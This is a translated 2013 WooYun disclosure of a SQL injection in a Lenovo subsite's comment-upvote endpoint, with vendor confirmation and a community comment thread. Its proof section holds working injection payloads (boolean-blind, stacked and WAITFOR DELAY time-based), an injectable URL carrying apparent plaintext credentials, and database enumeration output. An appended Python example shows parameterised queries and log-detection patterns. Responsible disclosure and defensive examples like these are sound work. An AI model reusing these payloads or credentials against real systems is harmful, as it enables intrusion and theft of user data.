
Vulnerability summary (24 followers)

Defect ID: wooyun-2013-035295

Title: Lenovo security issue no. 7: yet another subsite with a SQL injection vulnerability

Vendor: Lenovo

Author: VIP

Submitted: 2013-08-26 12:07

Fixed: 2013-10-10 12:08

Published: 2013-10-10 12:08

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2013-08-26: Details sent to the vendor, awaiting vendor action
2013-08-26: Vendor confirmed; details visible to the vendor only
2013-09-05: Details disclosed to core white hats and domain experts
2013-09-15: Details disclosed to regular white hats
2013-09-25: Details disclosed to intern white hats
2013-10-10: Details disclosed to the public

Brief description:

There is no end to these vulnerabilities. Yet another subsite has an injection point, and this one is somewhat hidden.

Detailed description:

Injection point:

http://serviceshop.lenovo.com.cn/WebAjaxHelper.ashx?commentsno=ab637223-3828-473c-a2be-058e346ec925&sysun=wsilenovo&sysup=wsi@123lenovo&type=commentsused&_=1377485978815


This is the endpoint for upvoting a comment; the commentsno parameter is injectable.

Proof of vulnerability:

---
Place: GET
Parameter: commentsno
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: commentsno=ab637223-3828-473c-a2be-058e346ec925' AND 9492=9492 AND 'uPDv'='uPDv&sysun=wsilenovo&sysup=wsi@123lenovo&type=commentsused&_=1377485978815
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: commentsno=ab637223-3828-473c-a2be-058e346ec925'; WAITFOR DELAY '0:0:5'--&sysun=wsilenovo&sysup=wsi@123lenovo&type=commentsused&_=1377485978815
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: commentsno=ab637223-3828-473c-a2be-058e346ec925' WAITFOR DELAY '0:0:5'--&sysun=wsilenovo&sysup=wsi@123lenovo&type=commentsused&_=1377485978815
---


web server operating system: Windows 2003
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008


Current database:

current database:    'ServiceShop'


78 tables:

[11:08:06] [INFO] fetching number of tables for database 'ServiceShop'
[11:08:06] [INFO] resumed: 78


It was fairly slow, so I only enumerated the first batch of table names.



Dumped the first row of the VIP user table.


Fix recommendation:

Filter the input.

Copyright notice: when republishing, credit the source VIP@WooYun
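The fix the report asks for, shown as an added example that is not Lenovo's code or part of the original report: the vulnerable string concatenation beside a hardened lookup that validates commentsno as a GUID and binds it as a query parameter, plus a log-triage check for the payload shapes in the proof section. It assumes an in-memory sqlite3 table as a stand-in for the SQL Server backend and a hypothetical comments table; all sample data is constructed.

```python
import re
import sqlite3
import uuid
from urllib.parse import unquote_plus

# Legitimate commentsno values are GUIDs (see the original request), so the
# handler can reject anything else before it ever reaches the database.
GUID_RE = re.compile(r"[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)

def build_query_unsafe(commentsno):
    # Vulnerable shape, kept only for contrast: the parameter is pasted into the
    # SQL text, so a single quote closes the literal and the rest is executed.
    return "SELECT COUNT(*) FROM comments WHERE commentsno = '" + commentsno + "'"

def is_valid_commentsno(value):
    return GUID_RE.fullmatch(value) is not None

def make_demo_db():
    # Constructed in-memory stand-in for the comments table (sqlite3, not MSSQL).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE comments (id INTEGER PRIMARY KEY, commentsno TEXT)")
    conn.execute("INSERT INTO comments (commentsno) VALUES (?)",
                 ("ab637223-3828-473c-a2be-058e346ec925",))
    return conn

def count_comments(conn, commentsno):
    # Hardened shape: validate, normalise through uuid.UUID, then bind the value
    # as a query parameter so it can never change the statement's structure.
    if not is_valid_commentsno(commentsno):
        raise ValueError("commentsno must be a GUID")
    guid = str(uuid.UUID(commentsno))
    row = conn.execute("SELECT COUNT(*) FROM comments WHERE commentsno = ?", (guid,)).fetchone()
    return row[0]

# Web-log triage for the payload shapes in the proof section: WAITFOR DELAY for
# the time-based and stacked variants, quote + AND n=n for boolean-based blind.
MARKERS = [re.compile(r"WAITFOR\s+DELAY", re.I), re.compile(r"'\s*AND\s+\d+=\d+", re.I)]

def suspicious_requests(log_lines):
    # Decode the query string first so URL-encoded payloads are not missed.
    return [line for line in log_lines if any(m.search(unquote_plus(line)) for m in MARKERS)]

SAMPLE_LOG = [  # constructed lines, not taken from any real server log
    "GET /WebAjaxHelper.ashx?commentsno=ab637223-3828-473c-a2be-058e346ec925&type=commentsused 200",
    "GET /WebAjaxHelper.ashx?commentsno=ab637223-3828-473c-a2be-058e346ec925%27%20AND%209492%3D9492%20AND%20%27a%27%3D%27a 200",
    "GET /WebAjaxHelper.ashx?commentsno=ab637223-3828-473c-a2be-058e346ec925%27%3B%20WAITFOR%20DELAY%20%270:0:5%27-- 200",
]
```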


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2013-08-26 14:39

Vendor reply:

Thank you for your contribution to Lenovo security! We will assess and fix the vulnerability immediately.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2013-08-26 12:21 | sex is not show Certified white hat ( Regular white hat | Rank:1495 Vulns:233 | This guy is so lazy!)

    This is a serial!~~

  2. 2013-08-26 12:24 | VIP ( Regular white hat | Rank:759 Vulns:100 )

    @sex is not show Yep

  3. 2013-08-26 12:24 | 小胖子 Certified white hat ( Core white hat | Rank:1727 Vulns:140 | If the sea could carry away my shortness and ugliness...)

    mark

  4. 2013-08-26 12:24 | 带馅儿馒头 ( Regular white hat | Rank:1278 Vulns:143 | Where there's heart, there's a dream)

    @VIP Young man, has Lenovo asked for your contact details yet?

  5. 2013-08-26 12:24 | VIP ( Regular white hat | Rank:759 Vulns:100 )

    @带馅儿馒头 Nope

  6. 2013-08-26 12:25 | 78基佬 ( Intern white hat | Rank:84 Vulns:20 | A designer who can't hack sites isn't a good product manager)

    Watching the top-scoring intern!

  7. 2013-08-26 12:27 | 带馅儿馒头 ( Regular white hat | Rank:1278 Vulns:143 | Where there's heart, there's a dream)

    @VIP So no gifts this time? They didn't ask me either,,,

  8. 2013-08-26 12:34 | zeracker Certified white hat ( Core white hat | Rank:1068 Vulns:137 | More WooYun, more opportunities! WeChat public account: id:a301zls ...)

    The Lenovo folks are getting tortured to death...

  9. 2013-08-26 12:35 | sex is not show Certified white hat ( Regular white hat | Rank:1495 Vulns:233 | This guy is so lazy!)

    @VIP Lenovo is handing out gifts; I bet you'll get a big one in the next batch~~

  10. 2013-08-26 12:49 | 养乐多Ngan ( Regular white hat | Rank:652 Vulns:72 | Hello,world. Actually the biggest vulnerability is the human heart.)

    I only found one.. you found 7... that's the skill gap...

  11. 2013-08-26 13:10 | 小痞子 ( Regular white hat | Rank:106 Vulns:21 | <xss>alert("a")</xss>¥&@&……dssKhwjcw...)

    This has "ignored" written all over it~~

  12. 2013-08-26 13:18 | VIP ( Regular white hat | Rank:759 Vulns:100 )

    @小痞子 This is headed for 20 rank. Want to bet wb on it?

  13. 2013-08-26 13:30 | 淡漠天空 Certified white hat ( Intern white hat | Rank:1113 Vulns:142 | M: Selling GOV STATE NSA CIA NASA DHS Symant...)

    Have you done Lenovo's PRM system and OA yet? If not, you can keep the serial going.

  14. 2013-08-26 13:49 | 小痞子 ( Regular white hat | Rank:106 Vulns:21 | <xss>alert("a")</xss>¥&@&……dssKhwjcw...)

    @VIP 20 rank for a subsite injection isn't realistic. I'll bet you all of z7y's wb.

  15. 2013-08-26 15:32 | 淡漠天空 Certified white hat ( Intern white hat | Rank:1113 Vulns:142 | M: Selling GOV STATE NSA CIA NASA DHS Symant...)

    @VIP 15 rank

  16. 2013-08-26 16:56 | 小痞子 ( Regular white hat | Rank:106 Vulns:21 | <xss>alert("a")</xss>¥&@&……dssKhwjcw...)

    No win, no loss~~ we're even, next time again